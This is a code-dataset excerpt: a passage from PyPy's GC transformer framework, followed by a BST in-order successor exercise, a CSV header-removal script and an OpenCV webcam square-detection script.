c_size,\n c_varitemsize, c_ofstolength]\n livevars = self.push_roots(hop)\n v_result = hop.genop(\"direct_call\", [malloc_ptr] + args,\n resulttype=llmemory.GCREF)\n self.pop_roots(hop, livevars)\n return v_result\n\n gct_fv_gc_malloc_varsize = gct_fv_gc_malloc\n\n def gct_gc__collect(self, hop):\n op = hop.spaceop\n if len(op.args) == 1:\n v_gen = op.args[0]\n else:\n # pick a number larger than expected different gc gens :-)\n v_gen = rmodel.inputconst(lltype.Signed, 9)\n livevars = self.push_roots(hop)\n hop.genop(\"direct_call\", [self.collect_ptr, self.c_const_gc, v_gen],\n resultvar=op.result)\n self.pop_roots(hop, livevars)\n\n def gct_gc_can_move(self, hop):\n op = hop.spaceop\n v_addr = hop.genop('cast_ptr_to_adr',\n [op.args[0]], resulttype=llmemory.Address)\n hop.genop(\"direct_call\", [self.can_move_ptr, self.c_const_gc, v_addr],\n resultvar=op.result)\n\n def gct_shrink_array(self, hop):\n if self.shrink_array_ptr is None:\n return GCTransformer.gct_shrink_array(self, hop)\n op = hop.spaceop\n v_addr = hop.genop('cast_ptr_to_adr',\n [op.args[0]], resulttype=llmemory.Address)\n v_length = 
op.args[1]\n hop.genop(\"direct_call\", [self.shrink_array_ptr, self.c_const_gc,\n v_addr, v_length],\n resultvar=op.result)\n\n def gct_gc_assume_young_pointers(self, hop):\n if not hasattr(self, 'assume_young_pointers_ptr'):\n return\n op = hop.spaceop\n v_addr = op.args[0]\n if v_addr.concretetype != llmemory.Address:\n v_addr = hop.genop('cast_ptr_to_adr',\n [v_addr], resulttype=llmemory.Address)\n hop.genop(\"direct_call\", [self.assume_young_pointers_ptr,\n self.c_const_gc, v_addr])\n\n def gct_gc_heap_stats(self, hop):\n if not hasattr(self, 'heap_stats_ptr'):\n return GCTransformer.gct_gc_heap_stats(self, hop)\n op = hop.spaceop\n livevars = self.push_roots(hop)\n hop.genop(\"direct_call\", [self.heap_stats_ptr, self.c_const_gc],\n resultvar=op.result)\n self.pop_roots(hop, livevars)\n\n def gct_get_member_index(self, hop):\n op = hop.spaceop\n v_typeid = op.args[0]\n hop.genop(\"direct_call\", [self.get_member_index_ptr, self.c_const_gc,\n v_typeid], resultvar=op.result)\n\n def _gc_adr_of_gc_attr(self, hop, attrname):\n if getattr(self.gcdata.gc, attrname, None) is None:\n raise NotImplementedError(\"gc_adr_of_%s only for generational gcs\"\n % (attrname,))\n op = hop.spaceop\n ofs = llmemory.offsetof(self.c_const_gc.concretetype.TO,\n 'inst_' + attrname)\n c_ofs = rmodel.inputconst(lltype.Signed, ofs)\n v_gc_adr = hop.genop('cast_ptr_to_adr', [self.c_const_gc],\n resulttype=llmemory.Address)\n hop.genop('adr_add', [v_gc_adr, c_ofs], resultvar=op.result)\n\n def gct_gc_adr_of_nursery_free(self, hop):\n self._gc_adr_of_gc_attr(hop, 'nursery_free')\n def gct_gc_adr_of_nursery_top(self, hop):\n self._gc_adr_of_gc_attr(hop, 'nursery_top')\n\n def _gc_adr_of_gcdata_attr(self, hop, attrname):\n op = hop.spaceop\n ofs = llmemory.offsetof(self.c_const_gcdata.concretetype.TO,\n 'inst_' + attrname)\n c_ofs = rmodel.inputconst(lltype.Signed, ofs)\n v_gcdata_adr = hop.genop('cast_ptr_to_adr', [self.c_const_gcdata],\n resulttype=llmemory.Address)\n hop.genop('adr_add', [v_gcdata_adr, c_ofs], resultvar=op.result)\n\n def gct_gc_adr_of_root_stack_base(self, hop):\n self._gc_adr_of_gcdata_attr(hop, 'root_stack_base')\n def gct_gc_adr_of_root_stack_top(self, hop):\n self._gc_adr_of_gcdata_attr(hop, 'root_stack_top')\n\n def gct_gc_shadowstackref_new(self, hop):\n op = hop.spaceop\n livevars = self.push_roots(hop)\n hop.genop(\"direct_call\", [self.root_walker.gc_shadowstackref_new_ptr],\n resultvar=op.result)\n self.pop_roots(hop, livevars)\n\n def gct_gc_shadowstackref_context(self, hop):\n op = hop.spaceop\n hop.genop(\"direct_call\",\n [self.root_walker.gc_shadowstackref_context_ptr, op.args[0]],\n resultvar=op.result)\n\n def gct_gc_shadowstackref_destroy(self, hop):\n op = hop.spaceop\n hop.genop(\"direct_call\",\n [self.root_walker.gc_shadowstackref_destroy_ptr, op.args[0]])\n\n def gct_gc_save_current_state_away(self, hop):\n op = hop.spaceop\n hop.genop(\"direct_call\",\n [self.root_walker.gc_save_current_state_away_ptr,\n op.args[0], op.args[1]])\n\n def gct_gc_forget_current_state(self, hop):\n hop.genop(\"direct_call\",\n [self.root_walker.gc_forget_current_state_ptr])\n\n def gct_gc_restore_state_from(self, hop):\n op = hop.spaceop\n hop.genop(\"direct_call\",\n [self.root_walker.gc_restore_state_from_ptr,\n op.args[0]])\n\n def gct_gc_start_fresh_new_state(self, hop):\n hop.genop(\"direct_call\",\n [self.root_walker.gc_start_fresh_new_state_ptr])\n\n def gct_gc_x_swap_pool(self, hop):\n raise NotImplementedError(\"old operation deprecated\")\n def gct_gc_x_clone(self, hop):\n raise 
NotImplementedError(\"old operation deprecated\")\n def gct_gc_x_size_header(self, hop):\n raise NotImplementedError(\"old operation deprecated\")\n\n def gct_do_malloc_fixedsize_clear(self, hop):\n # used by the JIT (see pypy.jit.backend.llsupport.gc)\n op = hop.spaceop\n [v_typeid, v_size,\n v_has_finalizer, v_has_light_finalizer, v_contains_weakptr] = op.args\n livevars = self.push_roots(hop)\n hop.genop(\"direct_call\",\n [self.malloc_fixedsize_clear_ptr, self.c_const_gc,\n v_typeid, v_size,\n v_has_finalizer, v_has_light_finalizer,\n v_contains_weakptr],\n resultvar=op.result)\n self.pop_roots(hop, livevars)\n\n def gct_do_malloc_varsize_clear(self, hop):\n # used by the JIT (see pypy.jit.backend.llsupport.gc)\n op = hop.spaceop\n [v_typeid, v_length, v_size, v_itemsize,\n v_offset_to_length] = op.args\n livevars = self.push_roots(hop)\n hop.genop(\"direct_call\",\n [self.malloc_varsize_clear_ptr, self.c_const_gc,\n v_typeid, v_length, v_size, v_itemsize,\n v_offset_to_length],\n resultvar=op.result)\n self.pop_roots(hop, livevars)\n\n def gct_get_write_barrier_failing_case(self, hop):\n op = hop.spaceop\n hop.genop(\"same_as\",\n [self.write_barrier_failing_case_ptr],\n resultvar=op.result)\n\n def gct_get_write_barrier_from_array_failing_case(self, hop):\n op = hop.spaceop\n v = getattr(self, 'write_barrier_from_array_failing_case_ptr',\n lltype.nullptr(op.result.concretetype.TO))\n hop.genop(\"same_as\", [v], resultvar=op.result)\n\n def gct_zero_gc_pointers_inside(self, hop):\n if not self.malloc_zero_filled:\n v_ob = hop.spaceop.args[0]\n TYPE = v_ob.concretetype.TO\n gen_zero_gc_pointers(TYPE, v_ob, hop.llops)\n\n def gct_gc_writebarrier_before_copy(self, hop):\n op = hop.spaceop\n if not hasattr(self, 'wb_before_copy_ptr'):\n # no write barrier needed in that case\n hop.genop(\"same_as\",\n [rmodel.inputconst(lltype.Bool, True)],\n resultvar=op.result)\n return\n source_addr = hop.genop('cast_ptr_to_adr', [op.args[0]],\n resulttype=llmemory.Address)\n dest_addr = hop.genop('cast_ptr_to_adr', [op.args[1]],\n resulttype=llmemory.Address)\n hop.genop('direct_call', [self.wb_before_copy_ptr, self.c_const_gc,\n source_addr, dest_addr] + op.args[2:],\n resultvar=op.result)\n\n def gct_weakref_create(self, hop):\n op = hop.spaceop\n\n type_id = self.get_type_id(WEAKREF)\n\n c_type_id = rmodel.inputconst(TYPE_ID, type_id)\n info = self.layoutbuilder.get_info(type_id)\n c_size = rmodel.inputconst(lltype.Signed, info.fixedsize)\n malloc_ptr = self.malloc_fixedsize_ptr\n c_false = rmodel.inputconst(lltype.Bool, False)\n c_has_weakptr = rmodel.inputconst(lltype.Bool, True)\n args = [self.c_const_gc, c_type_id, c_size,\n c_false, c_false, c_has_weakptr]\n\n # push and pop the current live variables *including* the argument\n # to the weakref_create operation, which must be kept alive and\n # moved if the GC needs to collect\n livevars = self.push_roots(hop, keep_current_args=True)\n v_result = hop.genop(\"direct_call\", [malloc_ptr] + args,\n resulttype=llmemory.GCREF)\n v_result = hop.genop(\"cast_opaque_ptr\", [v_result],\n resulttype=WEAKREFPTR)\n self.pop_roots(hop, livevars)\n # cast_ptr_to_adr must be done after malloc, as the GC pointer\n # might have moved just now.\n v_instance, = op.args\n v_addr = hop.genop(\"cast_ptr_to_adr\", [v_instance],\n resulttype=llmemory.Address)\n hop.genop(\"bare_setfield\",\n [v_result, rmodel.inputconst(lltype.Void, \"weakptr\"), v_addr])\n v_weakref = hop.genop(\"cast_ptr_to_weakrefptr\", [v_result],\n resulttype=llmemory.WeakRefPtr)\n 
hop.cast_result(v_weakref)\n\n def gct_weakref_deref(self, hop):\n v_wref, = hop.spaceop.args\n v_addr = hop.genop(\"direct_call\",\n [self.weakref_deref_ptr, v_wref],\n resulttype=llmemory.Address)\n hop.cast_result(v_addr)\n\n def gct_gc_identityhash(self, hop):\n livevars = self.push_roots(hop)\n [v_ptr] = hop.spaceop.args\n v_ptr = hop.genop(\"cast_opaque_ptr\", [v_ptr],\n resulttype=llmemory.GCREF)\n hop.genop(\"direct_call\",\n [self.identityhash_ptr, self.c_const_gc, v_ptr],\n resultvar=hop.spaceop.result)\n self.pop_roots(hop, livevars)\n\n def gct_gc_id(self, hop):\n if self.id_ptr is not None:\n livevars = self.push_roots(hop)\n [v_ptr] = hop.spaceop.args\n v_ptr = hop.genop(\"cast_opaque_ptr\", [v_ptr],\n resulttype=llmemory.GCREF)\n hop.genop(\"direct_call\", [self.id_ptr, self.c_const_gc, v_ptr],\n resultvar=hop.spaceop.result)\n self.pop_roots(hop, livevars)\n else:\n hop.rename('cast_ptr_to_int') # works nicely for non-moving GCs\n\n def gct_gc_obtain_free_space(self, hop):\n livevars = self.push_roots(hop)\n [v_number] = hop.spaceop.args\n hop.genop(\"direct_call\",\n [self.obtainfreespace_ptr, self.c_const_gc, v_number],\n resultvar=hop.spaceop.result)\n self.pop_roots(hop, livevars)\n\n def gct_gc_set_max_heap_size(self, hop):\n [v_size] = hop.spaceop.args\n hop.genop(\"direct_call\", [self.set_max_heap_size_ptr,\n self.c_const_gc,\n v_size])\n\n def gct_gc_thread_prepare(self, hop):\n pass # no effect any more\n\n def gct_gc_thread_run(self, hop):\n assert self.translator.config.translation.thread\n if hasattr(self.root_walker, 'thread_run_ptr'):\n livevars = self.push_roots(hop)\n hop.genop(\"direct_call\", [self.root_walker.thread_run_ptr])\n self.pop_roots(hop, livevars)\n\n def gct_gc_thread_start(self, hop):\n assert self.translator.config.translation.thread\n if hasattr(self.root_walker, 'thread_start_ptr'):\n # only with asmgcc. 
Note that this is actually called after\n # the first gc_thread_run() in the new thread.\n hop.genop(\"direct_call\", [self.root_walker.thread_start_ptr])\n\n def gct_gc_thread_die(self, hop):\n assert self.translator.config.translation.thread\n if hasattr(self.root_walker, 'thread_die_ptr'):\n livevars = self.push_roots(hop)\n hop.genop(\"direct_call\", [self.root_walker.thread_die_ptr])\n self.pop_roots(hop, livevars)\n\n def gct_gc_thread_before_fork(self, hop):\n if (self.translator.config.translation.thread\n and hasattr(self.root_walker, 'thread_before_fork_ptr')):\n hop.genop(\"direct_call\", [self.root_walker.thread_before_fork_ptr],\n resultvar=hop.spaceop.result)\n else:\n c_null = rmodel.inputconst(llmemory.Address, llmemory.NULL)\n hop.genop(\"same_as\", [c_null],\n resultvar=hop.spaceop.result)\n\n def gct_gc_thread_after_fork(self, hop):\n if (self.translator.config.translation.thread\n and hasattr(self.root_walker, 'thread_after_fork_ptr')):\n livevars = self.push_roots(hop)\n hop.genop(\"direct_call\", [self.root_walker.thread_after_fork_ptr]\n + hop.spaceop.args)\n self.pop_roots(hop, livevars)\n\n def gct_gc_get_type_info_group(self, hop):\n return hop.cast_result(self.c_type_info_group)\n\n def gct_gc_get_rpy_roots(self, hop):\n livevars = self.push_roots(hop)\n hop.genop(\"direct_call\",\n [self.get_rpy_roots_ptr, self.c_const_gc],\n resultvar=hop.spaceop.result)\n self.pop_roots(hop, livevars)\n\n def gct_gc_get_rpy_referents(self, hop):\n livevars = self.push_roots(hop)\n [v_ptr] = hop.spaceop.args\n hop.genop(\"direct_call\",\n [self.get_rpy_referents_ptr, self.c_const_gc, v_ptr],\n resultvar=hop.spaceop.result)\n self.pop_roots(hop, livevars)\n\n def gct_gc_get_rpy_memory_usage(self, hop):\n livevars = self.push_roots(hop)\n [v_ptr] = hop.spaceop.args\n hop.genop(\"direct_call\",\n [self.get_rpy_memory_usage_ptr, self.c_const_gc, v_ptr],\n resultvar=hop.spaceop.result)\n self.pop_roots(hop, livevars)\n\n def gct_gc_get_rpy_type_index(self, hop):\n livevars = self.push_roots(hop)\n [v_ptr] = hop.spaceop.args\n hop.genop(\"direct_call\",\n [self.get_rpy_type_index_ptr, self.c_const_gc, v_ptr],\n resultvar=hop.spaceop.result)\n self.pop_roots(hop, livevars)\n\n def gct_gc_is_rpy_instance(self, hop):\n livevars = self.push_roots(hop)\n [v_ptr] = hop.spaceop.args\n hop.genop(\"direct_call\",\n [self.is_rpy_instance_ptr, self.c_const_gc, v_ptr],\n resultvar=hop.spaceop.result)\n self.pop_roots(hop, livevars)\n\n def gct_gc_dump_rpy_heap(self, hop):\n livevars = self.push_roots(hop)\n [v_fd] = hop.spaceop.args\n hop.genop(\"direct_call\",\n [self.dump_rpy_heap_ptr, self.c_const_gc, v_fd],\n resultvar=hop.spaceop.result)\n self.pop_roots(hop, livevars)\n\n def gct_gc_typeids_z(self, hop):\n livevars = self.push_roots(hop)\n hop.genop(\"direct_call\",\n [self.get_typeids_z_ptr, self.c_const_gc],\n resultvar=hop.spaceop.result)\n self.pop_roots(hop, livevars)\n\n def gct_malloc_nonmovable_varsize(self, hop):\n TYPE = hop.spaceop.result.concretetype\n if self.gcdata.gc.can_malloc_nonmovable():\n return self.gct_malloc_varsize(hop, {'nonmovable':True})\n c = rmodel.inputconst(TYPE, lltype.nullptr(TYPE.TO))\n return hop.cast_result(c)\n\n def gct_malloc_nonmovable(self, hop):\n TYPE = hop.spaceop.result.concretetype\n if self.gcdata.gc.can_malloc_nonmovable():\n return self.gct_malloc(hop, {'nonmovable':True})\n c = rmodel.inputconst(TYPE, lltype.nullptr(TYPE.TO))\n return hop.cast_result(c)\n\n def _set_into_gc_array_part(self, op):\n if op.opname == 'setarrayitem':\n return 
op.args[1]\n if op.opname == 'setinteriorfield':\n for v in op.args[1:-1]:\n if v.concretetype is not lltype.Void:\n return v\n return None\n\n def transform_generic_set(self, hop):\n from pypy.objspace.flow.model import Constant\n opname = hop.spaceop.opname\n v_struct = hop.spaceop.args[0]\n v_newvalue = hop.spaceop.args[-1]\n assert opname in ('setfield', 'setarrayitem', 'setinteriorfield')\n assert isinstance(v_newvalue.concretetype, lltype.Ptr)\n # XXX for some GCs the skipping if the newvalue is a constant won't be\n # ok\n if (self.write_barrier_ptr is not None\n and not isinstance(v_newvalue, Constant)\n and v_struct.concretetype.TO._gckind == \"gc\"\n and hop.spaceop not in self.clean_sets):\n v_newvalue = hop.genop(\"cast_ptr_to_adr\", [v_newvalue],\n resulttype = llmemory.Address)\n v_structaddr = hop.genop(\"cast_ptr_to_adr\", [v_struct],\n resulttype = llmemory.Address)\n if (self.write_barrier_from_array_ptr is not None and\n self._set_into_gc_array_part(hop.spaceop) is not None):\n self.write_barrier_from_array_calls += 1\n v_index = self._set_into_gc_array_part(hop.spaceop)\n assert v_index.concretetype == lltype.Signed\n hop.genop(\"direct_call\", [self.write_barrier_from_array_ptr,\n self.c_const_gc,\n v_newvalue,\n v_structaddr,\n v_index])\n else:\n self.write_barrier_calls += 1\n hop.genop(\"direct_call\", [self.write_barrier_ptr,\n self.c_const_gc,\n v_newvalue,\n v_structaddr])\n hop.rename('bare_' + opname)\n\n def transform_getfield_typeptr(self, hop):\n # this would become quite a lot of operations, even if it compiles\n # to C code that is just as efficient as \"obj->typeptr\". To avoid\n # that, we just generate a single custom operation instead.\n hop.genop('gc_gettypeptr_group', [hop.spaceop.args[0],\n self.c_type_info_group,\n self.c_vtinfo_skip_offset,\n self.c_vtableinfo],\n resultvar = hop.spaceop.result)\n\n def transform_setfield_typeptr(self, hop):\n # replace such a setfield with an assertion that the typeptr is right\n # (xxx not very useful right now, so disabled)\n if 0:\n v_new = hop.spaceop.args[2]\n v_old = hop.genop('gc_gettypeptr_group', [hop.spaceop.args[0],\n self.c_type_info_group,\n self.c_vtinfo_skip_offset,\n self.c_vtableinfo],\n resulttype = v_new.concretetype)\n v_eq = hop.genop(\"ptr_eq\", [v_old, v_new],\n resulttype = lltype.Bool)\n c_errmsg = rmodel.inputconst(lltype.Void,\n \"setfield_typeptr: wrong type\")\n hop.genop('debug_assert', [v_eq, c_errmsg])\n\n def gct_getfield(self, hop):\n if (hop.spaceop.args[1].value == 'typeptr' and\n hop.spaceop.args[0].concretetype.TO._hints.get('typeptr') and\n self.translator.config.translation.gcremovetypeptr):\n self.transform_getfield_typeptr(hop)\n else:\n GCTransformer.gct_getfield(self, hop)\n\n def gct_setfield(self, hop):\n if (hop.spaceop.args[1].value == 'typeptr' and\n hop.spaceop.args[0].concretetype.TO._hints.get('typeptr') and\n self.translator.config.translation.gcremovetypeptr):\n self.transform_setfield_typeptr(hop)\n else:\n GCTransformer.gct_setfield(self, hop)\n\n def var_needs_set_transform(self, var):\n return var_needsgc(var)\n\n def push_alive_nopyobj(self, var, llops):\n pass\n\n def pop_alive_nopyobj(self, var, llops):\n pass\n\n def get_livevars_for_roots(self, hop, keep_current_args=False):\n if self.gcdata.gc.moving_gc and not keep_current_args:\n # moving GCs don't borrow, so the caller does not need to keep\n # the arguments alive\n livevars = [var for var in hop.livevars_after_op()\n if not var_ispyobj(var)]\n else:\n livevars = hop.livevars_after_op() + 
hop.current_op_keeps_alive()\n livevars = [var for var in livevars if not var_ispyobj(var)]\n return livevars\n\n def push_roots(self, hop, keep_current_args=False):\n if self.incr_stack_ptr is None:\n return\n livevars = self.get_livevars_for_roots(hop, keep_current_args)\n self.num_pushs += len(livevars)\n if not livevars:\n return []\n c_len = rmodel.inputconst(lltype.Signed, len(livevars) )\n base_addr = hop.genop(\"direct_call\", [self.incr_stack_ptr, c_len ],\n resulttype=llmemory.Address)\n c_type = rmodel.inputconst(lltype.Void, llmemory.Address)\n for k,var in enumerate(livevars):\n c_k = rmodel.inputconst(lltype.Signed, k)\n v_adr = gen_cast(hop.llops, llmemory.Address, var)\n hop.genop(\"raw_store\", [base_addr, c_type, c_k, v_adr])\n return livevars\n\n def pop_roots(self, hop, livevars):\n if self.decr_stack_ptr is None:\n return\n if not livevars:\n return\n c_len = rmodel.inputconst(lltype.Signed, len(livevars) )\n base_addr = hop.genop(\"direct_call\", [self.decr_stack_ptr, c_len ],\n resulttype=llmemory.Address)\n if self.gcdata.gc.moving_gc:\n # for moving collectors, reload the roots into the local variables\n c_type = rmodel.inputconst(lltype.Void, llmemory.Address)\n for k,var in enumerate(livevars):\n c_k = rmodel.inputconst(lltype.Signed, k)\n v_newaddr = hop.genop(\"raw_load\", [base_addr, c_type, c_k],\n resulttype=llmemory.Address)\n hop.genop(\"gc_reload_possibly_moved\", [v_newaddr, var])\n\n def compute_borrowed_vars(self, graph):\n # XXX temporary workaround, should be done more correctly\n if self.gcdata.gc.moving_gc:\n return lambda v: False\n return super(FrameworkGCTransformer, self).compute_borrowed_vars(graph)\n\n\nclass TransformerLayoutBuilder(gctypelayout.TypeLayoutBuilder):\n\n def __init__(self, translator, GCClass=None):\n if GCClass is None:\n from pypy.rpython.memory.gc.base import choose_gc_from_config\n GCClass, _ = choose_gc_from_config(translator.config)\n if translator.config.translation.gcremovetypeptr:\n lltype2vtable = translator.rtyper.lltype2vtable\n else:\n lltype2vtable = None\n self.translator = translator\n super(TransformerLayoutBuilder, self).__init__(GCClass, lltype2vtable)\n\n def has_finalizer(self, TYPE):\n rtti = get_rtti(TYPE)\n return rtti is not None and getattr(rtti._obj, 'destructor_funcptr',\n None)\n\n def has_light_finalizer(self, TYPE):\n special = self.special_funcptr_for_type(TYPE)\n return special is not None and special[0] == 'light_finalizer'\n\n def has_custom_trace(self, TYPE):\n rtti = get_rtti(TYPE)\n return rtti is not None and getattr(rtti._obj, 'custom_trace_funcptr',\n None)\n\n def make_finalizer_funcptr_for_type(self, TYPE):\n if not self.has_finalizer(TYPE):\n return None, False\n rtti = get_rtti(TYPE)\n destrptr = rtti._obj.destructor_funcptr\n DESTR_ARG = lltype.typeOf(destrptr).TO.ARGS[0]\n assert not type_contains_pyobjs(TYPE), \"not implemented\"\n typename = TYPE.__name__\n def ll_finalizer(addr, ignored):\n v = llmemory.cast_adr_to_ptr(addr, DESTR_ARG)\n ll_call_destructor(destrptr, v, typename)\n return llmemory.NULL\n fptr = self.transformer.annotate_finalizer(ll_finalizer,\n [llmemory.Address, llmemory.Address], llmemory.Address)\n g = destrptr._obj.graph\n light = not FinalizerAnalyzer(self.translator).analyze_light_finalizer(g)\n return fptr, light\n\n def make_custom_trace_funcptr_for_type(self, TYPE):\n if not self.has_custom_trace(TYPE):\n return None\n rtti = get_rtti(TYPE)\n fptr = rtti._obj.custom_trace_funcptr\n if not hasattr(fptr._obj, 'graph'):\n ll_func = fptr._obj._callable\n 
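# the custom trace hook came as a bare callable with no graph attached;\n # annotate it here so the transformer builds one, as done for finalizers above\n 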
fptr = self.transformer.annotate_finalizer(ll_func,\n [llmemory.Address, llmemory.Address], llmemory.Address)\n return fptr\n\n\ndef gen_zero_gc_pointers(TYPE, v, llops, previous_steps=None):\n if previous_steps is None:\n previous_steps = []\n assert isinstance(TYPE, lltype.Struct)\n for name in TYPE._names:\n c_name = rmodel.inputconst(lltype.Void, name)\n FIELD = getattr(TYPE, name)\n if isinstance(FIELD, lltype.Ptr) and FIELD._needsgc():\n c_null = rmodel.inputconst(FIELD, lltype.nullptr(FIELD.TO))\n if not previous_steps:\n llops.genop('bare_setfield', [v, c_name, c_null])\n else:\n llops.genop('bare_setinteriorfield',\n [v] + previous_steps + [c_name, c_null])\n elif isinstance(FIELD, lltype.Struct):\n gen_zero_gc_pointers(FIELD, v, llops, previous_steps + [c_name])\n\n# ____________________________________________________________\n\n\nsizeofaddr = llmemory.sizeof(llmemory.Address)\n\n\nclass BaseRootWalker(object):\n need_root_stack = False\n thread_setup = None\n\n def __init__(self, gctransformer):\n self.gcdata = gctransformer.gcdata\n self.gc = self.gcdata.gc\n\n def _freeze_(self):\n return True\n\n def setup_root_walker(self):\n if self.thread_setup is not None:\n self.thread_setup()\n\n def walk_roots(self, collect_stack_root,\n collect_static_in_prebuilt_nongc,\n collect_static_in_prebuilt_gc):\n gcdata = self.gcdata\n gc = self.gc\n if collect_static_in_prebuilt_nongc:\n addr = gcdata.static_root_start\n end = gcdata.static_root_nongcend\n while addr != end:\n result = addr.address[0]\n if gc.points_to_valid_gc_object(result):\n collect_static_in_prebuilt_nongc(gc, result)\n addr += sizeofaddr\n if collect_static_in_prebuilt_gc:\n addr = gcdata.static_root_nongcend\n end = gcdata.static_root_end\n while addr != end:\n result = addr.address[0]\n if gc.points_to_valid_gc_object(result):\n collect_static_in_prebuilt_gc(gc, result)\n addr += sizeofaddr\n if collect_stack_root:\n self.walk_stack_roots(collect_stack_root) # abstract\n\n def need_stacklet_support(self):\n raise Exception(\"%s does not support stacklets\" % (\n self.__class__.__name__,))\n\n def need_thread_support(self, gctransformer, getfn):\n raise Exception(\"%s does not support threads\" % (\n self.__class__.__name__,))\n","repo_name":"diffoperator/Sypy","sub_path":"rpython/memory/gctransform/framework.py","file_name":"framework.py","file_ext":"py","file_size_in_byte":62453,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"66"} +{"seq_id":"36307593423","text":"# Given a binary search tree, write an algorithm to find the \"next\" (in-order) node of a given node in a BST.\n# Assume all nodes have links to their parents.\n\n# Idea: One way is to just do the in-order traversal, but this costs O(n) time.\n# Another way is to find the node, which can be done quickly. \n# Cases:\n# If the node has no right child, then traverse up the parents until we hit a bigger (or identical) node. If we hit the root and no match,\n# then return None.\n# If the node has a right child, go to it, then go all the way to the left-most child.\n\nfrom binarysearchtree import BinarySearchTree\nimport random\n\ndef getNextNode(node):\n curr = node\n if node.right is None:\n while curr.parent:\n curr = curr.parent\n if curr.value >= node.value:\n return curr\n else:\n curr = node.right\n while curr.left:\n curr = curr.left\n return curr\n\n return None\n\n# Get a random node from the tree. 
Not great efficiency (O(n)) but it gets the job done.\ndef getRandomNode(tree):\n treeSize = tree.getSize()\n targetIndex = random.randint(0, treeSize - 1)\n index = 0\n \n queue = [tree]\n\n while True:\n curr = queue.pop(0)\n if index == targetIndex:\n return curr\n \n index += 1\n\n if curr.left:\n queue.append(curr.left)\n if curr.right:\n queue.append(curr.right)\n\n# Testing\n\ntree = BinarySearchTree()\nelements = []\nfor i in range(20):\n value = random.randint(0, 50)\n tree.insert(value)\n elements.append(value)\n\nprint(\"Your tree:\", end = \" \")\ntree.traverseBFS()\n\nnode = getRandomNode(tree)\nnextNode = getNextNode(node)\n\nif nextNode:\n print(\"Your node: %d\\nNext node: %d\" % (node.value, nextNode.value))\nelse:\n print(\"Your node: %d\\nNo next node\" % node.value)\n\nelements = sorted(elements)\n\nnodeIndex = elements.index(node.value)\n\nif nextNode:\n assert elements[nodeIndex + 1] in [nextNode.value, node.value]\nelse:\n assert node.value == max(elements)","repo_name":"PBearson/cracking-the-coding-interview","sub_path":"9-interview-questions/4-trees-and-graphs/4-6.py","file_name":"4-6.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"37581488725","text":"''' \n\nSay you have the boring job of removing the first line from several hundred\nCSV files. Maybe you’ll be feeding them into an automated process that\nrequires just the data and not the headers at the top of the columns. You\ncould open each file in Excel, delete the first row, and resave the file—but\nthat would take hours. Let’s write a program to do it instead.\nThe program will need to open every file with the .csv extension in the\ncurrent working directory, read in the contents of the CSV file, and rewrite\nthe contents without the first row to a file of the same name. This will\nreplace the old contents of the CSV file with the new, headless contents.\n\nAt a high level, the program must do the following:\n•\t Find all the CSV files in the current working directory.\n•\t Read in the full contents of each file.\n•\t Write out the contents, skipping the first line, to a new CSV file.\nAt the code level, this means the program will need to do the following:\n•\t Loop over a list of files from os.listdir(), skipping the non-CSV files.\n•\t Create a CSV Reader object and read in the contents of the file, using\nthe line_num attribute to figure out which line to skip.\n•\t Create a CSV Writer object and write out the read-in data to the new file.\n\n'''\n#! 
python3\n# removeCsvHeader.py - Removes the header from all CSV files in the current\n# working directory.\nimport csv, os\n\ndef project_one():\n os.makedirs('projectOne', exist_ok=True)\n\n # Loop through every file in the current working directory.\n for csvFilename in os.listdir('.'):\n if not csvFilename.endswith('.csv'):\n continue # skip non-csv files\n print('Removing header from ' + csvFilename + '...')\n # Read the CSV file in (skipping first row).\n csvRows = []\n csvFileObj = open(csvFilename)\n readerObj = csv.reader(csvFileObj)\n for row in readerObj:\n if readerObj.line_num == 1:\n continue # skip first row\n csvRows.append(row)\n csvFileObj.close()\n\n # Write out the CSV file.\n csvFileObj = open(os.path.join('projectOne', csvFilename), 'w',\n newline='')\n csvWriter = csv.writer(csvFileObj)\n for row in csvRows:\n csvWriter.writerow(row)\n csvFileObj.close()\n\n\nif __name__ == \"__main__\":\n project_one()","repo_name":"ftarantuviez/Automate-Boring-Stuff-with-Python","sub_path":"chapter14/project_1.py","file_name":"project_1.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33138673817","text":"import cv2\r\n\r\n# contour storage\r\ncontours = {}\r\n# array for detected polygons\r\napprox = []\r\n# size of the printed text\r\nscale = 1\r\n# open the camera\r\ncap = cv2.VideoCapture(0)\r\n\r\n# detect polygons frame by frame\r\nwhile(cap.isOpened()):\r\n # capture one camera frame per iteration\r\n ret, frame = cap.read()\r\n if ret==True:\r\n # convert to grayscale\r\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n # Canny edge detection\r\n canny = cv2.Canny(frame,80,240,3)\r\n\r\n # build the contours\r\n canny2, contours, hierarchy = cv2.findContours(canny,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\r\n for i in range(0,len(contours)):\r\n\r\n # approximate the contour perimeter\r\n approx = cv2.approxPolyDP(contours[i],cv2.arcLength(contours[i],True)*0.02,True)\r\n\r\n # extra check to skip small or non-convex (unclear) objects\r\n if(abs(cv2.contourArea(contours[i]))<100 or not(cv2.isContourConvex(approx))):\r\n continue\r\n\r\n elif(len(approx)==4):\r\n\r\n # count the polygon's vertices\r\n vtc = len(approx)\r\n\r\n # if 4 vertices are detected = square\r\n x,y,w,h = cv2.boundingRect(contours[i])\r\n if(vtc==4):\r\n # print the 'PERSEGI' (square) label inside the frame\r\n cv2.putText(frame, 'PERSEGI', (x, y), cv2.FONT_HERSHEY_SIMPLEX, scale, (0, 255, 255), 2, cv2.LINE_AA)\r\n\r\n\r\n\r\n # show the results\r\n cv2.drawContours(frame, contours, -1, (0, 255, 0), 3)\r\n cv2.imshow('frame',frame)\r\n cv2.imshow('canny',canny)\r\n if cv2.waitKey(1) == 1048689:\r\n break\r\n\r\n# finish\r\ncap.release()\r\ncv2.destroyAllWindows()","repo_name":"tondy666/OpenCV-Shape-Detection","sub_path":"realtime_shape_detection.py","file_name":"realtime_shape_detection.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"31677159235","text":"\n# how the print lookup works: 1) the instance attributes set in __init__ 2) then the inherited class's __init__ 3) then the class variable of B, and then of 